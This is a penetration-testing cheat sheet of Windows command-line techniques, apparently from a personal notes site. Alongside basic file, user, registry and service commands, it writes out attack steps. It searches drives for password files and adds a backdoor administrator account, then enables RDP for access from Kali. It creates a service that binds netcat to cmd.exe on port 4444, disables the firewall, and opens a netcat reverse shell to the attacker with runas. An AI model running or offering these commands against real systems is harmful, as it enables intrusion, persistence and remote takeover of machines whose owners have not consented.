# 1 Windows cmd kungfu

## Search

```
type myfile   ..display
type *.txt    ..multiple
type my1 my2  ..multiple
type my1 | find /i "pass"  ..search-in-file
type my1 | findstr [regex]
more my1      ..onepage-at-a-time
set          ..view env vars
set path     ..view path
set username ..view usern

dir /b /s mydir\file
dir /b /s c:\pass.txt
dir /b /s %systemroot%\hosts
b - bare 
s - subdir/recurse

search all of c: for 'pass.txt' even subfolders
wildcards are supported too

--------------------
--------------------
Software Inventory Search:
dir /s "c:\Program Files"
dir /s "c:\Program Files (x86)"
```

## Read Files

```
type myfile                  ..display
type *.txt                   ..multiple
type my1 my2                 ..multiple
type my1 | find /i "pass"    ..search-in-file
type my1 | findstr [regex]   ..regex
more my1                     ..onepage-at-a-time
```

## Environment

```
set           ..view env vars
set path      ..view path
set username  ..view usern
```

## Search:

* b - bare
* s - subdir/recurse

```
dir /b /s mydir\file
dir /b /s c:\pass.txt          ..search all of c: for 'pass.txt'
dir /b /s %systemroot%\hosts   ..find the hosts file
```

## Software Inventory Search:

```
dir /s "c:\Program Files"
dir /s "c:\Program Files (x86)"
```

## Windows Users

```
net user 
net user mike p$$wrd /add 
net user mike /del

net localgroup 
net localgroup administrators 
net localgroup administrators mike /add 
net localgroup administrators mike /del
```

## AD Lockout Settings

```
net accounts /domain
```

## RDP Trick

* REF: [PrivEscWin-Churrasco](https://pentest.mxhx.org/win-privesc#churrasco)

```
> net user
> net user mikes hacks /add
> net localgroup administrators mikes /add

Allow Remote Access:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Kali:
> sudo apt-get update
> sudo apt-get install rdesktop
> rdesktop -u mike -p hacks legacy    ..CONNECT WITH RDP !!!
```

## Windows Password policy

```
net accounts
net accounts /domain
wmic useraccount list brief
```

## Windows registry

```
reg query key1
reg \\mypc query key1
reg add key1 /v value /t type /d data
reg export key1 key.reg
reg import key.reg
```

## Windows smb

* REF: [MoveFilesSMB](https://pentest.mxhx.org/06-linux-privesc/04-transfer-files#smb)

```
session:
net use \\IP pw /u:bob

mount:
net use * \\IP\share pw /u:bob
net use \\IP /del
net use * /del /y

may need:
/u:machinename\bob
```

## Windows services

```
sc query sc query state= all 
sc qc svcname sc \10.0.0.5 qc mysvc 
sc start mysvc 
sc config mysvc start= demand 
sc stop mysvc services.msc ..gui 

wmic: 
where (displayname like "%hello%") get name
```

## Windows psexec

```
net use \\$IP /u:bob            ..get smb session
psexec \\$IP -d -u -p command   ..leaves svc @finish
psexec \\$IP ipconfig
psexec \\$IP cmd.exe
psexec \\$IP cmd.exe -s -d      ..system, detached/background
```

## Windows schedule tasks

```
schtasks /query /s $IP
schtasks /create /tn taskname /s $IP /u bob /p pass
/sc freq /st stime /sd sdate /tr command

schtasks /create /tn taskname /s $IP /ru   ..system
/sc HOURLY/ONCE/DAILY /st HH:MM:SS 
/sd sdate /tr command
```

## Windows Services & Processes

```
net use \\$IP /u:bob  ..get smb session first!!
sc \\$IP query schedule
sc \\$IP create svcnm binpath= mycmd               ..30 sec
sc \\$IP create svcnm binpath= "cmd.exe /k mycmd"  ..will die
sc \\$IP create ncsvc binpath= "cmd.exe /k c:\Tools\nc.exe -lp 4444 -e cmd.exe"

sc \\$IP start svcnm
net time \\$IP

or 'ServifyThis'

wmic /node:/10.x.x.x /user:bobadmin /password:p@ss process call create [command]

Multiples sessions!
wmic /node:@C:\tmp\iplist /user:bob /password:paxx
process call create [command]

Look at processes:
wmic /node:/$IP /user:bob /password:paxx
process list brief
process where processid="PID" delete
process where name="[name]" delete
```

## Windows Firewall

```
netsh /?   ..view network settings
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh advfirewall firewall add rule name "Comment" dir=in action=allow remoteid=$IP protocol=TCP localport=23
netsh advfirewall firewall del rule name "Comment"

Port-forward:
netsh interface portproxy add v4tov4 listenport=8000 connectport=80 connectaddress=$IP
```

## runas

* Creates a reverse shell from a windows server to Kali
* Using netcat for Windows and Runas.exe:

```
C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc $IP 4444 -e cmd.exe"

Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
```